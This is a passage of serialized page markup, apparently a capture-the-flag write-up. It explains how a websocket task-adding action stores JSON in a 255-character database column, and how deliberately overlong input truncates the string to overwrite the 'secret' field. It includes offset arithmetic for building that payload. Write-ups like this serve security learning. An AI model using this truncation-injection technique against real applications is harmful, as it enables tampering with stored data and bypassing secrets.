",{"type":33,"tag":128,"props":50445,"children":50446},{"style":1576},[50447],{"type":38,"value":5720},{"type":33,"tag":128,"props":50449,"children":50450},{"style":140},[50451],{"type":38,"value":23474},{"type":33,"tag":128,"props":50453,"children":50454},{"style":1576},[50455],{"type":38,"value":5730},{"type":33,"tag":128,"props":50457,"children":50458},{"style":676},[50459],{"type":38,"value":5739},{"type":33,"tag":128,"props":50461,"children":50462},{"style":312},[50463],{"type":38,"value":5815},{"type":33,"tag":128,"props":50465,"children":50467},{"class":130,"line":50466},57,[50468],{"type":33,"tag":128,"props":50469,"children":50470},{"style":312},[50471],{"type":38,"value":50113},{"type":33,"tag":128,"props":50473,"children":50475},{"class":130,"line":50474},58,[50476],{"type":33,"tag":128,"props":50477,"children":50478},{"style":312},[50479],{"type":38,"value":39766},{"type":33,"tag":128,"props":50481,"children":50483},{"class":130,"line":50482},59,[50484,50488,50492,50496,50500,50504,50508,50512,50516,50520,50524,50528,50532,50536,50540,50544,50548,50552,50556,50560,50564,50568],{"type":33,"tag":128,"props":50485,"children":50486},{"style":306},[50487],{"type":38,"value":49536},{"type":33,"tag":128,"props":50489,"children":50490},{"style":312},[50491],{"type":38,"value":215},{"type":33,"tag":128,"props":50493,"children":50494},{"style":135},[50495],{"type":38,"value":23433},{"type":33,"tag":128,"props":50497,"children":50498},{"style":312},[50499],{"type":38,"value":5566},{"type":33,"tag":128,"props":50501,"children":50502},{"style":306},[50503],{"type":38,"value":6301},{"type":33,"tag":128,"props":50505,"children":50506},{"style":312},[50507],{"type":38,"value":215},{"type":33,"tag":128,"props":50509,"children":50510},{"style":135},[50511],{"type":38,"value":49561},{"type":33,"tag":128,"props":50513,"children":50514},{"style":312},[50515],{"type":38,"value":5836},{"type":33,"tag":128,"props":50517,"children":50518},{"style":437},[50519],{"type":38,"value":5841},{"type":33,"tag":128,"props":50521,"children":50522},{"style":312},[50523],{"type":38,"value":284},{"type":33,"tag":128,"props":50525,"children":50526},{"style":1576},[50527],{"type":38,"value":5850},{"type":33,"tag":128,"props":50529,"children":50530},{"style":312},[50531],{"type":38,"value":5584},{"type":33,"tag":128,"props":50533,"children":50534},{"style":437},[50535],{"type":38,"value":14849},{"type":33,"tag":128,"props":50537,"children":50538},{"style":312},[50539],{"type":38,"value":284},{"type":33,"tag":128,"props":50541,"children":50542},{"style":676},[50543],{"type":38,"value":6739},{"type":33,"tag":128,"props":50545,"children":50546},{"style":140},[50547],{"type":38,"value":13526},{"type":33,"tag":128,"props":50549,"children":50550},{"style":676},[50551],{"type":38,"value":6040},{"type":33,"tag":128,"props":50553,"children":50554},{"style":312},[50555],{"type":38,"value":5584},{"type":33,"tag":128,"props":50557,"children":50558},{"style":437},[50559],{"type":38,"value":49842},{"type":33,"tag":128,"props":50561,"children":50562},{"style":312},[50563],{"type":38,"value":284},{"type":33,"tag":128,"props":50565,"children":50566},{"style":306},[50567],{"type":38,"value":49842},{"type":33,"tag":128,"props":50569,"children":50570},{"style":312},[50571],{"type":38,"value":14256},{"type":33,"tag":128,"props":50573,"children":50575},{"class":130,"line":50574},60,[50576,50580,50584,50588,50592,50596],{"type":33,"tag":128,"props":50577,"children":50578},{"style":312},[50579],{"type":38,"value":49613},{"type":33,"tag":128,"props":50581,"children":50582},{"style":1576},[50583],{"type":38,"value":6855},{"type":33,"tag":128,"props":50585,"children":50586},{"style":312},[50587],{"type":38,"value":2852},{"type":33,"tag":128,"props":50589,"children":50590},{"style":306},[50591],{"type":38,"value":23474},{"type":33,"tag":128,"props":50593,"children":50594},{"style":312},[50595],{"type":38,"value":2966},{"type":33,"tag":128,"props":50597,"children":50598},{"style":312},[50599],{"type":38,"value":762},{"type":33,"tag":128,"props":50601,"children":50603},{"class":130,"line":50602},61,[50604,50608,50612,50616,50620,50624,50628,50632,50636,50640,50644,50648,50652,50656,50660,50664,50668,50672],{"type":33,"tag":128,"props":50605,"children":50606},{"style":306},[50607],{"type":38,"value":49536},{"type":33,"tag":128,"props":50609,"children":50610},{"style":312},[50611],{"type":38,"value":215},{"type":33,"tag":128,"props":50613,"children":50614},{"style":135},[50615],{"type":38,"value":23433},{"type":33,"tag":128,"props":50617,"children":50618},{"style":312},[50619],{"type":38,"value":5566},{"type":33,"tag":128,"props":50621,"children":50622},{"style":306},[50623],{"type":38,"value":6301},{"type":33,"tag":128,"props":50625,"children":50626},{"style":312},[50627],{"type":38,"value":215},{"type":33,"tag":128,"props":50629,"children":50630},{"style":135},[50631],{"type":38,"value":49561},{"type":33,"tag":128,"props":50633,"children":50634},{"style":312},[50635],{"type":38,"value":5836},{"type":33,"tag":128,"props":50637,"children":50638},{"style":437},[50639],{"type":38,"value":5841},{"type":33,"tag":128,"props":50641,"children":50642},{"style":312},[50643],{"type":38,"value":284},{"type":33,"tag":128,"props":50645,"children":50646},{"style":1576},[50647],{"type":38,"value":6721},{"type":33,"tag":128,"props":50649,"children":50650},{"style":312},[50651],{"type":38,"value":5584},{"type":33,"tag":128,"props":50653,"children":50654},{"style":437},[50655],{"type":38,"value":14849},{"type":33,"tag":128,"props":50657,"children":50658},{"style":312},[50659],{"type":38,"value":284},{"type":33,"tag":128,"props":50661,"children":50662},{"style":676},[50663],{"type":38,"value":6739},{"type":33,"tag":128,"props":50665,"children":50666},{"style":140},[50667],{"type":38,"value":13526},{"type":33,"tag":128,"props":50669,"children":50670},{"style":676},[50671],{"type":38,"value":6040},{"type":33,"tag":128,"props":50673,"children":50674},{"style":312},[50675],{"type":38,"value":14256},{"type":33,"tag":128,"props":50677,"children":50679},{"class":130,"line":50678},62,[50680],{"type":33,"tag":128,"props":50681,"children":50682},{"style":312},[50683],{"type":38,"value":35996},{"type":33,"tag":128,"props":50685,"children":50687},{"class":130,"line":50686},63,[50688],{"type":33,"tag":128,"props":50689,"children":50690},{"style":312},[50691],{"type":38,"value":15318},{"type":33,"tag":128,"props":50693,"children":50695},{"class":130,"line":50694},64,[50696,50700],{"type":33,"tag":128,"props":50697,"children":50698},{"style":1576},[50699],{"type":38,"value":49730},{"type":33,"tag":128,"props":50701,"children":50702},{"style":312},[50703],{"type":38,"value":762},{"type":33,"tag":128,"props":50705,"children":50707},{"class":130,"line":50706},65,[50708,50712,50716,50720,50724,50728,50732,50736,50740,50744,50748,50752,50756,50760,50764,50768,50773,50777],{"type":33,"tag":128,"props":50709,"children":50710},{"style":306},[50711],{"type":38,"value":49152},{"type":33,"tag":128,"props":50713,"children":50714},{"style":312},[50715],{"type":38,"value":215},{"type":33,"tag":128,"props":50717,"children":50718},{"style":135},[50719],{"type":38,"value":23433},{"type":33,"tag":128,"props":50721,"children":50722},{"style":312},[50723],{"type":38,"value":5566},{"type":33,"tag":128,"props":50725,"children":50726},{"style":306},[50727],{"type":38,"value":6301},{"type":33,"tag":128,"props":50729,"children":50730},{"style":312},[50731],{"type":38,"value":215},{"type":33,"tag":128,"props":50733,"children":50734},{"style":135},[50735],{"type":38,"value":49561},{"type":33,"tag":128,"props":50737,"children":50738},{"style":312},[50739],{"type":38,"value":5836},{"type":33,"tag":128,"props":50741,"children":50742},{"style":437},[50743],{"type":38,"value":5841},{"type":33,"tag":128,"props":50745,"children":50746},{"style":312},[50747],{"type":38,"value":284},{"type":33,"tag":128,"props":50749,"children":50750},{"style":1576},[50751],{"type":38,"value":6721},{"type":33,"tag":128,"props":50753,"children":50754},{"style":312},[50755],{"type":38,"value":5584},{"type":33,"tag":128,"props":50757,"children":50758},{"style":437},[50759],{"type":38,"value":14251},{"type":33,"tag":128,"props":50761,"children":50762},{"style":312},[50763],{"type":38,"value":284},{"type":33,"tag":128,"props":50765,"children":50766},{"style":676},[50767],{"type":38,"value":6739},{"type":33,"tag":128,"props":50769,"children":50770},{"style":140},[50771],{"type":38,"value":50772},"Invalid action",{"type":33,"tag":128,"props":50774,"children":50775},{"style":676},[50776],{"type":38,"value":6040},{"type":33,"tag":128,"props":50778,"children":50779},{"style":312},[50780],{"type":38,"value":14256},{"type":33,"tag":128,"props":50782,"children":50784},{"class":130,"line":50783},66,[50785],{"type":33,"tag":128,"props":50786,"children":50787},{"style":312},[50788],{"type":38,"value":15318},{"type":33,"tag":128,"props":50790,"children":50792},{"class":130,"line":50791},67,[50793],{"type":33,"tag":128,"props":50794,"children":50795},{"style":312},[50796],{"type":38,"value":13745},{"type":33,"tag":128,"props":50798,"children":50800},{"class":130,"line":50799},68,[50801],{"type":33,"tag":128,"props":50802,"children":50803},{"style":312},[50804],{"type":38,"value":9876},{"type":33,"tag":128,"props":50806,"children":50808},{"class":130,"line":50807},69,[50809],{"type":33,"tag":128,"props":50810,"children":50811},{"emptyLinePlaceholder":896},[50812],{"type":38,"value":899},{"type":33,"tag":128,"props":50814,"children":50816},{"class":130,"line":50815},70,[50817,50821,50825,50829,50833,50837,50841,50845,50850,50854,50858],{"type":33,"tag":128,"props":50818,"children":50819},{"style":437},[50820],{"type":38,"value":48697},{"type":33,"tag":128,"props":50822,"children":50823},{"style":312},[50824],{"type":38,"value":215},{"type":33,"tag":128,"props":50826,"children":50827},{"style":437},[50828],{"type":38,"value":48706},{"type":33,"tag":128,"props":50830,"children":50831},{"style":312},[50832],{"type":38,"value":5657},{"type":33,"tag":128,"props":50834,"children":50835},{"style":312},[50836],{"type":38,"value":2852},{"type":33,"tag":128,"props":50838,"children":50839},{"style":306},[50840],{"type":38,"value":40700},{"type":33,"tag":128,"props":50842,"children":50843},{"style":312},[50844],{"type":38,"value":5584},{"type":33,"tag":128,"props":50846,"children":50847},{"style":306},[50848],{"type":38,"value":50849}," session",{"type":33,"tag":128,"props":50851,"children":50852},{"style":312},[50853],{"type":38,"value":2966},{"type":33,"tag":128,"props":50855,"children":50856},{"style":312},[50857],{"type":38,"value":5625},{"type":33,"tag":128,"props":50859,"children":50860},{"style":312},[50861],{"type":38,"value":762},{"type":33,"tag":128,"props":50863,"children":50865},{"class":130,"line":50864},71,[50866,50871,50875,50880],{"type":33,"tag":128,"props":50867,"children":50868},{"style":306},[50869],{"type":38,"value":50870}," db",{"type":33,"tag":128,"props":50872,"children":50873},{"style":312},[50874],{"type":38,"value":5657},{"type":33,"tag":128,"props":50876,"children":50877},{"style":306},[50878],{"type":38,"value":50879}," database",{"type":33,"tag":128,"props":50881,"children":50882},{"style":312},[50883],{"type":38,"value":5676},{"type":33,"tag":128,"props":50885,"children":50887},{"class":130,"line":50886},72,[50888,50892,50896,50900],{"type":33,"tag":128,"props":50889,"children":50890},{"style":306},[50891],{"type":38,"value":49024},{"type":33,"tag":128,"props":50893,"children":50894},{"style":312},[50895],{"type":38,"value":5657},{"type":33,"tag":128,"props":50897,"children":50898},{"style":306},[50899],{"type":38,"value":50849},{"type":33,"tag":128,"props":50901,"children":50902},{"style":312},[50903],{"type":38,"value":5676},{"type":33,"tag":128,"props":50905,"children":50907},{"class":130,"line":50906},73,[50908,50912,50916],{"type":33,"tag":128,"props":50909,"children":50910},{"style":1576},[50911],{"type":38,"value":6810},{"type":33,"tag":128,"props":50913,"children":50914},{"style":306},[50915],{"type":38,"value":48967},{"type":33,"tag":128,"props":50917,"children":50918},{"style":312},[50919],{"type":38,"value":5676},{"type":33,"tag":128,"props":50921,"children":50923},{"class":130,"line":50922},74,[50924],{"type":33,"tag":128,"props":50925,"children":50926},{"style":312},[50927],{"type":38,"value":9876},{"type":33,"tag":47,"props":50929,"children":50930},{},[50931,50933,50938,50940,50945,50947,50953,50955,50960,50962,50967],{"type":38,"value":50932},"We need to concentrate on the ",{"type":33,"tag":105,"props":50934,"children":50936},{"className":50935},[],[50937],{"type":38,"value":49388},{"type":38,"value":50939}," action. The ",{"type":33,"tag":105,"props":50941,"children":50943},{"className":50942},[],[50944],{"type":38,"value":49388},{"type":38,"value":50946}," action will add a task in the database. The task is ",{"type":33,"tag":105,"props":50948,"children":50950},{"className":50949},[],[50951],{"type":38,"value":50952},"JSON.stringify",{"type":38,"value":50954}," and stored in the ",{"type":33,"tag":105,"props":50956,"children":50958},{"className":50957},[],[50959],{"type":38,"value":2815},{"type":38,"value":50961}," column. And there are no protection against long string. So we can overwrite the ",{"type":33,"tag":105,"props":50963,"children":50965},{"className":50964},[],[50966],{"type":38,"value":46812},{"type":38,"value":50968}," key.",{"type":33,"tag":114,"props":50970,"children":50971},{"lang":5526},[50972],{"type":33,"tag":119,"props":50973,"children":50975},{"code":50974,"language":5526,"meta":8,"className":5530,"style":8},"if (data.action === 'add') {\n try {\n await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n ws.send(JSON.stringify({ success: true, action: 'add' }));\n } catch (e) {\n ws.send(JSON.stringify({ success: false, action: 'add' }));\n }\n}\n",[50976],{"type":33,"tag":105,"props":50977,"children":50978},{"__ignoreMap":8},[50979,51026,51037,51148,51224,51251,51326,51333],{"type":33,"tag":128,"props":50980,"children":50981},{"class":130,"line":131},[50982,50986,50990,50994,50998,51002,51006,51010,51014,51018,51022],{"type":33,"tag":128,"props":50983,"children":50984},{"style":1576},[50985],{"type":38,"value":10991},{"type":33,"tag":128,"props":50987,"children":50988},{"style":312},[50989],{"type":38,"value":2852},{"type":33,"tag":128,"props":50991,"children":50992},{"style":306},[50993],{"type":38,"value":2815},{"type":33,"tag":128,"props":50995,"children":50996},{"style":312},[50997],{"type":38,"value":215},{"type":33,"tag":128,"props":50999,"children":51000},{"style":306},[51001],{"type":38,"value":12513},{"type":33,"tag":128,"props":51003,"children":51004},{"style":300},[51005],{"type":38,"value":13595},{"type":33,"tag":128,"props":51007,"children":51008},{"style":676},[51009],{"type":38,"value":6739},{"type":33,"tag":128,"props":51011,"children":51012},{"style":140},[51013],{"type":38,"value":49388},{"type":33,"tag":128,"props":51015,"children":51016},{"style":676},[51017],{"type":38,"value":6040},{"type":33,"tag":128,"props":51019,"children":51020},{"style":312},[51021],{"type":38,"value":2966},{"type":33,"tag":128,"props":51023,"children":51024},{"style":312},[51025],{"type":38,"value":762},{"type":33,"tag":128,"props":51027,"children":51028},{"class":130,"line":362},[51029,51033],{"type":33,"tag":128,"props":51030,"children":51031},{"style":1576},[51032],{"type":38,"value":16034},{"type":33,"tag":128,"props":51034,"children":51035},{"style":312},[51036],{"type":38,"value":762},{"type":33,"tag":128,"props":51038,"children":51039},{"class":130,"line":403},[51040,51044,51048,51052,51056,51060,51064,51068,51072,51076,51080,51084,51088,51092,51096,51100,51104,51108,51112,51116,51120,51124,51128,51132,51136,51140,51144],{"type":33,"tag":128,"props":51041,"children":51042},{"style":1576},[51043],{"type":38,"value":17718},{"type":33,"tag":128,"props":51045,"children":51046},{"style":306},[51047],{"type":38,"value":46507},{"type":33,"tag":128,"props":51049,"children":51050},{"style":312},[51051],{"type":38,"value":215},{"type":33,"tag":128,"props":51053,"children":51054},{"style":135},[51055],{"type":38,"value":49432},{"type":33,"tag":128,"props":51057,"children":51058},{"style":312},[51059],{"type":38,"value":5566},{"type":33,"tag":128,"props":51061,"children":51062},{"style":306},[51063],{"type":38,"value":6566},{"type":33,"tag":128,"props":51065,"children":51066},{"style":312},[51067],{"type":38,"value":5584},{"type":33,"tag":128,"props":51069,"children":51070},{"style":676},[51071],{"type":38,"value":5710},{"type":33,"tag":128,"props":51073,"children":51074},{"style":140},[51075],{"type":38,"value":49453},{"type":33,"tag":128,"props":51077,"children":51078},{"style":1576},[51079],{"type":38,"value":5720},{"type":33,"tag":128,"props":51081,"children":51082},{"style":140},[51083],{"type":38,"value":2815},{"type":33,"tag":128,"props":51085,"children":51086},{"style":312},[51087],{"type":38,"value":215},{"type":33,"tag":128,"props":51089,"children":51090},{"style":140},[51091],{"type":38,"value":776},{"type":33,"tag":128,"props":51093,"children":51094},{"style":1576},[51095],{"type":38,"value":5730},{"type":33,"tag":128,"props":51097,"children":51098},{"style":140},[51099],{"type":38,"value":49478},{"type":33,"tag":128,"props":51101,"children":51102},{"style":1576},[51103],{"type":38,"value":5720},{"type":33,"tag":128,"props":51105,"children":51106},{"style":140},[51107],{"type":38,"value":2815},{"type":33,"tag":128,"props":51109,"children":51110},{"style":312},[51111],{"type":38,"value":215},{"type":33,"tag":128,"props":51113,"children":51114},{"style":140},[51115],{"type":38,"value":12236},{"type":33,"tag":128,"props":51117,"children":51118},{"style":1576},[51119],{"type":38,"value":5730},{"type":33,"tag":128,"props":51121,"children":51122},{"style":140},[51123],{"type":38,"value":49503},{"type":33,"tag":128,"props":51125,"children":51126},{"style":1576},[51127],{"type":38,"value":5720},{"type":33,"tag":128,"props":51129,"children":51130},{"style":140},[51131],{"type":38,"value":46812},{"type":33,"tag":128,"props":51133,"children":51134},{"style":1576},[51135],{"type":38,"value":5730},{"type":33,"tag":128,"props":51137,"children":51138},{"style":140},[51139],{"type":38,"value":49520},{"type":33,"tag":128,"props":51141,"children":51142},{"style":676},[51143],{"type":38,"value":5739},{"type":33,"tag":128,"props":51145,"children":51146},{"style":312},[51147],{"type":38,"value":5815},{"type":33,"tag":128,"props":51149,"children":51150},{"class":130,"line":739},[51151,51156,51160,51164,51168,51172,51176,51180,51184,51188,51192,51196,51200,51204,51208,51212,51216,51220],{"type":33,"tag":128,"props":51152,"children":51153},{"style":306},[51154],{"type":38,"value":51155}," ws",{"type":33,"tag":128,"props":51157,"children":51158},{"style":312},[51159],{"type":38,"value":215},{"type":33,"tag":128,"props":51161,"children":51162},{"style":135},[51163],{"type":38,"value":23433},{"type":33,"tag":128,"props":51165,"children":51166},{"style":312},[51167],{"type":38,"value":5566},{"type":33,"tag":128,"props":51169,"children":51170},{"style":306},[51171],{"type":38,"value":6301},{"type":33,"tag":128,"props":51173,"children":51174},{"style":312},[51175],{"type":38,"value":215},{"type":33,"tag":128,"props":51177,"children":51178},{"style":135},[51179],{"type":38,"value":49561},{"type":33,"tag":128,"props":51181,"children":51182},{"style":312},[51183],{"type":38,"value":5836},{"type":33,"tag":128,"props":51185,"children":51186},{"style":437},[51187],{"type":38,"value":5841},{"type":33,"tag":128,"props":51189,"children":51190},{"style":312},[51191],{"type":38,"value":284},{"type":33,"tag":128,"props":51193,"children":51194},{"style":1576},[51195],{"type":38,"value":5850},{"type":33,"tag":128,"props":51197,"children":51198},{"style":312},[51199],{"type":38,"value":5584},{"type":33,"tag":128,"props":51201,"children":51202},{"style":437},[51203],{"type":38,"value":14849},{"type":33,"tag":128,"props":51205,"children":51206},{"style":312},[51207],{"type":38,"value":284},{"type":33,"tag":128,"props":51209,"children":51210},{"style":676},[51211],{"type":38,"value":6739},{"type":33,"tag":128,"props":51213,"children":51214},{"style":140},[51215],{"type":38,"value":49388},{"type":33,"tag":128,"props":51217,"children":51218},{"style":676},[51219],{"type":38,"value":6040},{"type":33,"tag":128,"props":51221,"children":51222},{"style":312},[51223],{"type":38,"value":14256},{"type":33,"tag":128,"props":51225,"children":51226},{"class":130,"line":765},[51227,51231,51235,51239,51243,51247],{"type":33,"tag":128,"props":51228,"children":51229},{"style":312},[51230],{"type":38,"value":14264},{"type":33,"tag":128,"props":51232,"children":51233},{"style":1576},[51234],{"type":38,"value":6855},{"type":33,"tag":128,"props":51236,"children":51237},{"style":312},[51238],{"type":38,"value":2852},{"type":33,"tag":128,"props":51240,"children":51241},{"style":306},[51242],{"type":38,"value":23474},{"type":33,"tag":128,"props":51244,"children":51245},{"style":312},[51246],{"type":38,"value":2966},{"type":33,"tag":128,"props":51248,"children":51249},{"style":312},[51250],{"type":38,"value":762},{"type":33,"tag":128,"props":51252,"children":51253},{"class":130,"line":804},[51254,51258,51262,51266,51270,51274,51278,51282,51286,51290,51294,51298,51302,51306,51310,51314,51318,51322],{"type":33,"tag":128,"props":51255,"children":51256},{"style":306},[51257],{"type":38,"value":51155},{"type":33,"tag":128,"props":51259,"children":51260},{"style":312},[51261],{"type":38,"value":215},{"type":33,"tag":128,"props":51263,"children":51264},{"style":135},[51265],{"type":38,"value":23433},{"type":33,"tag":128,"props":51267,"children":51268},{"style":312},[51269],{"type":38,"value":5566},{"type":33,"tag":128,"props":51271,"children":51272},{"style":306},[51273],{"type":38,"value":6301},{"type":33,"tag":128,"props":51275,"children":51276},{"style":312},[51277],{"type":38,"value":215},{"type":33,"tag":128,"props":51279,"children":51280},{"style":135},[51281],{"type":38,"value":49561},{"type":33,"tag":128,"props":51283,"children":51284},{"style":312},[51285],{"type":38,"value":5836},{"type":33,"tag":128,"props":51287,"children":51288},{"style":437},[51289],{"type":38,"value":5841},{"type":33,"tag":128,"props":51291,"children":51292},{"style":312},[51293],{"type":38,"value":284},{"type":33,"tag":128,"props":51295,"children":51296},{"style":1576},[51297],{"type":38,"value":6721},{"type":33,"tag":128,"props":51299,"children":51300},{"style":312},[51301],{"type":38,"value":5584},{"type":33,"tag":128,"props":51303,"children":51304},{"style":437},[51305],{"type":38,"value":14849},{"type":33,"tag":128,"props":51307,"children":51308},{"style":312},[51309],{"type":38,"value":284},{"type":33,"tag":128,"props":51311,"children":51312},{"style":676},[51313],{"type":38,"value":6739},{"type":33,"tag":128,"props":51315,"children":51316},{"style":140},[51317],{"type":38,"value":49388},{"type":33,"tag":128,"props":51319,"children":51320},{"style":676},[51321],{"type":38,"value":6040},{"type":33,"tag":128,"props":51323,"children":51324},{"style":312},[51325],{"type":38,"value":14256},{"type":33,"tag":128,"props":51327,"children":51328},{"class":130,"line":839},[51329],{"type":33,"tag":128,"props":51330,"children":51331},{"style":312},[51332],{"type":38,"value":6760},{"type":33,"tag":128,"props":51334,"children":51335},{"class":130,"line":848},[51336],{"type":33,"tag":128,"props":51337,"children":51338},{"style":312},[51339],{"type":38,"value":854},{"type":33,"tag":40,"props":51341,"children":51343},{"id":51342},"data-column",[51344,51349],{"type":33,"tag":105,"props":51345,"children":51347},{"className":51346},[],[51348],{"type":38,"value":2815},{"type":38,"value":51350}," column",{"type":33,"tag":47,"props":51352,"children":51353},{},[51354,51355,51360],{"type":38,"value":2766},{"type":33,"tag":105,"props":51356,"children":51358},{"className":51357},[],[51359],{"type":38,"value":2815},{"type":38,"value":51361}," column have this definition:",{"type":33,"tag":114,"props":51363,"children":51364},{"lang":10492},[51365],{"type":33,"tag":119,"props":51366,"children":51368},{"code":51367,"language":10492,"meta":8,"className":41205,"style":8},"data VARCHAR(255) NOT NULL,\n",[51369],{"type":33,"tag":105,"props":51370,"children":51371},{"__ignoreMap":8},[51372],{"type":33,"tag":128,"props":51373,"children":51374},{"class":130,"line":131},[51375,51379,51383,51387,51391,51395,51399],{"type":33,"tag":128,"props":51376,"children":51377},{"style":1576},[51378],{"type":38,"value":2815},{"type":33,"tag":128,"props":51380,"children":51381},{"style":300},[51382],{"type":38,"value":46128},{"type":33,"tag":128,"props":51384,"children":51385},{"style":323},[51386],{"type":38,"value":5566},{"type":33,"tag":128,"props":51388,"children":51389},{"style":523},[51390],{"type":38,"value":46102},{"type":33,"tag":128,"props":51392,"children":51393},{"style":323},[51394],{"type":38,"value":10105},{"type":33,"tag":128,"props":51396,"children":51397},{"style":1576},[51398],{"type":38,"value":46111},{"type":33,"tag":128,"props":51400,"children":51401},{"style":323},[51402],{"type":38,"value":693},{"type":33,"tag":47,"props":51404,"children":51405},{},[51406,51408,51413],{"type":38,"value":51407},"So we can't store more than 255 characters. If we try to store more than 255 characters, the content will be truncated. It really nice because our big problem is we don't have the key to decrypt the data. With this we will able to overwrite the ",{"type":33,"tag":105,"props":51409,"children":51411},{"className":51410},[],[51412],{"type":38,"value":46812},{"type":38,"value":50968},{"type":33,"tag":40,"props":51415,"children":51417},{"id":51416},"constructing-our-payload",[51418],{"type":38,"value":51419},"Constructing our payload",{"type":33,"tag":47,"props":51421,"children":51422},{},[51423],{"type":38,"value":51424},"We know that this line is used to insert in database and there are any protection against long string.",{"type":33,"tag":114,"props":51426,"children":51427},{"lang":5526},[51428],{"type":33,"tag":119,"props":51429,"children":51431},{"code":51430,"language":5526,"meta":8,"className":5530,"style":8},"await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n",[51432],{"type":33,"tag":105,"props":51433,"children":51434},{"__ignoreMap":8},[51435],{"type":33,"tag":128,"props":51436,"children":51437},{"class":130,"line":131},[51438,51443,51447,51451,51455,51459,51463,51467,51471,51475,51479,51483,51487,51491,51495,51499,51503,51507,51511,51515,51519,51523,51527,51531,51535,51539,51543],{"type":33,"tag":128,"props":51439,"children":51440},{"style":1576},[51441],{"type":38,"value":51442},"await",{"type":33,"tag":128,"props":51444,"children":51445},{"style":306},[51446],{"type":38,"value":46507},{"type":33,"tag":128,"props":51448,"children":51449},{"style":312},[51450],{"type":38,"value":215},{"type":33,"tag":128,"props":51452,"children":51453},{"style":135},[51454],{"type":38,"value":49432},{"type":33,"tag":128,"props":51456,"children":51457},{"style":312},[51458],{"type":38,"value":5566},{"type":33,"tag":128,"props":51460,"children":51461},{"style":306},[51462],{"type":38,"value":6566},{"type":33,"tag":128,"props":51464,"children":51465},{"style":312},[51466],{"type":38,"value":5584},{"type":33,"tag":128,"props":51468,"children":51469},{"style":676},[51470],{"type":38,"value":5710},{"type":33,"tag":128,"props":51472,"children":51473},{"style":140},[51474],{"type":38,"value":49453},{"type":33,"tag":128,"props":51476,"children":51477},{"style":1576},[51478],{"type":38,"value":5720},{"type":33,"tag":128,"props":51480,"children":51481},{"style":140},[51482],{"type":38,"value":2815},{"type":33,"tag":128,"props":51484,"children":51485},{"style":312},[51486],{"type":38,"value":215},{"type":33,"tag":128,"props":51488,"children":51489},{"style":140},[51490],{"type":38,"value":776},{"type":33,"tag":128,"props":51492,"children":51493},{"style":1576},[51494],{"type":38,"value":5730},{"type":33,"tag":128,"props":51496,"children":51497},{"style":140},[51498],{"type":38,"value":49478},{"type":33,"tag":128,"props":51500,"children":51501},{"style":1576},[51502],{"type":38,"value":5720},{"type":33,"tag":128,"props":51504,"children":51505},{"style":140},[51506],{"type":38,"value":2815},{"type":33,"tag":128,"props":51508,"children":51509},{"style":312},[51510],{"type":38,"value":215},{"type":33,"tag":128,"props":51512,"children":51513},{"style":140},[51514],{"type":38,"value":12236},{"type":33,"tag":128,"props":51516,"children":51517},{"style":1576},[51518],{"type":38,"value":5730},{"type":33,"tag":128,"props":51520,"children":51521},{"style":140},[51522],{"type":38,"value":49503},{"type":33,"tag":128,"props":51524,"children":51525},{"style":1576},[51526],{"type":38,"value":5720},{"type":33,"tag":128,"props":51528,"children":51529},{"style":140},[51530],{"type":38,"value":46812},{"type":33,"tag":128,"props":51532,"children":51533},{"style":1576},[51534],{"type":38,"value":5730},{"type":33,"tag":128,"props":51536,"children":51537},{"style":140},[51538],{"type":38,"value":49520},{"type":33,"tag":128,"props":51540,"children":51541},{"style":676},[51542],{"type":38,"value":5739},{"type":33,"tag":128,"props":51544,"children":51545},{"style":312},[51546],{"type":38,"value":5815},{"type":33,"tag":47,"props":51548,"children":51549},{},[51550,51552,51557],{"type":38,"value":51551},"We need to calculate offset. To generate our payload, to add as we want in the ",{"type":33,"tag":105,"props":51553,"children":51555},{"className":51554},[],[51556],{"type":38,"value":2815},{"type":38,"value":51558}," column.",{"type":33,"tag":47,"props":51560,"children":51561},{},[51562],{"type":38,"value":51563},"We need to keep theses elements, and we need to generate an secret.",{"type":33,"tag":114,"props":51565,"children":51566},{},[51567],{"type":33,"tag":119,"props":51568,"children":51570},{"code":51569},"{\"title\":\"a\", => 13\n\"description\":\"\", => 17\n\"secret\":\"f3eeaa82370f7e9bfbc2caf16f6d19b7\",} => 45\n",[51571],{"type":33,"tag":105,"props":51572,"children":51573},{"__ignoreMap":8},[51574],{"type":38,"value":51569},{"type":33,"tag":47,"props":51576,"children":51577},{},[51578],{"type":38,"value":51579},"13 + 17 + 45 => 75\n255 - (75 - 1) => 181",{"type":33,"tag":47,"props":51581,"children":51582},{},[51583,51585,51590],{"type":38,"value":51584},"We remove one on our result because we want to close the string at the end of description:\nIf we retake the line of ",{"type":33,"tag":105,"props":51586,"children":51588},{"className":51587},[],[51589],{"type":38,"value":48750},{"type":38,"value":284},{"type":33,"tag":114,"props":51592,"children":51593},{"lang":5526},[51594],{"type":33,"tag":119,"props":51595,"children":51597},{"code":51596,"language":5526,"meta":8,"className":5530,"style":8},"await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\u003CSTOP_HERE>\",\"secret\":\"${secret}\"}`);\n",[51598],{"type":33,"tag":105,"props":51599,"children":51600},{"__ignoreMap":8},[51601],{"type":33,"tag":128,"props":51602,"children":51603},{"class":130,"line":131},[51604,51608,51612,51616,51620,51624,51628,51632,51636,51640,51644,51648,51652,51656,51660,51664,51668,51672,51676,51680,51684,51689,51693,51697,51701,51705,51709],{"type":33,"tag":128,"props":51605,"children":51606},{"style":1576},[51607],{"type":38,"value":51442},{"type":33,"tag":128,"props":51609,"children":51610},{"style":306},[51611],{"type":38,"value":46507},{"type":33,"tag":128,"props":51613,"children":51614},{"style":312},[51615],{"type":38,"value":215},{"type":33,"tag":128,"props":51617,"children":51618},{"style":135},[51619],{"type":38,"value":49432},{"type":33,"tag":128,"props":51621,"children":51622},{"style":312},[51623],{"type":38,"value":5566},{"type":33,"tag":128,"props":51625,"children":51626},{"style":306},[51627],{"type":38,"value":6566},{"type":33,"tag":128,"props":51629,"children":51630},{"style":312},[51631],{"type":38,"value":5584},{"type":33,"tag":128,"props":51633,"children":51634},{"style":676},[51635],{"type":38,"value":5710},{"type":33,"tag":128,"props":51637,"children":51638},{"style":140},[51639],{"type":38,"value":49453},{"type":33,"tag":128,"props":51641,"children":51642},{"style":1576},[51643],{"type":38,"value":5720},{"type":33,"tag":128,"props":51645,"children":51646},{"style":140},[51647],{"type":38,"value":2815},{"type":33,"tag":128,"props":51649,"children":51650},{"style":312},[51651],{"type":38,"value":215},{"type":33,"tag":128,"props":51653,"childre